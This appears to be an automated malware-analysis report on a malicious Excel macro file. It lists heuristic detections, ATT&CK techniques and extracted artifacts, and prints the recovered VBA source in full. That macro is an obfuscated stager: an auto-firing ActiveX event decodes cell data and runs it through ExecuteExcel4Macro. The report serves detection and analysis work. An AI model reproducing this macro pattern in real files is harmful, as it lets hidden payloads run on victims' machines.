MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is an XLSM file containing VBA macros. Heuristics indicate that the VBA code is designed to launch a decoded Excel 4.0 macro using ExecuteExcel4Macro. This technique is often used to download and execute further malicious content, hence the high confidence in a downloader or dropper role.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGERVBA code attached to an auto-firing ActiveX/UserForm control event (e.g. _Layout/_Change/_Painted) decodes a string with Replace/Split/Join/StrReverse/Chr and passes the recovered formula text to ExecuteExcel4Macro. This bridges VBA event activation into XLM formula execution to call Win32 APIs / drop payloads while evading AutoOpen and Shell keyword detection — a high-confidence macro stager, not a specific Office parser CVE.Matched line in script
ExecuteExcel4Macro Replace(Ss, "?", pipo) -
OOXML VBA project hides Excel 4 macro execution bridge high OOXML_VBA_XLM_BRIDGE_RAWRaw vbaProject.bin metadata references ExecuteExcel4Macro together with string-deobfuscation primitives, and the OOXML package exposes a button, drawing, or control surface that can invoke VBA. This is a macro/XLM stager indicator for projects whose source cannot be recovered cleanly; it is not a document-parser CVE attribution.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1160 bytes |
SHA-256: fcadffc723e48604b191a52df437faabbc19ec95e4194d1051b94ecf3dee1209 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "xerox, 25, 0, MSForms, Frame"
Sub vermont()
For Each s In ActiveSheet.UsedRange.SpecialCells(xlCellTypeVisible)
If s.NumberFormat = 0 Then k = k + Chr(s.Column)
Next
t = Split(k, "=")
nemer = Split(t(0), "!")
namer = t(1)
Randomize: pipo = nemer(Int((59 - 0 + 1) * Rnd + 0))
ecgho = Split(namer, "!")
For Each Ss In ecgho
ExecuteExcel4Macro Replace(Ss, "?", pipo)
Next
jo = 9: oj = jo: ActiveWorkbook.Close oj - jo: jo = 7
End Sub
Private Sub xerox_Layout()
epson: vermont
End Sub
Sub epson()
ut = 43
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 10752 bytes |
SHA-256: 86cb60cc030899946c32c8030d1e139b5a1eb63c7eb8233519a6fbeb56b98c2e |
|||
emf_00.emf |
ooxml-emf | OOXML EMF part: xl/media/image1.emf | 2024 bytes |
SHA-256: 8357e7f07f41a1e53a6ef35edda5f8d6ef14c676e025cb302cff4e47f3ae55a8 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.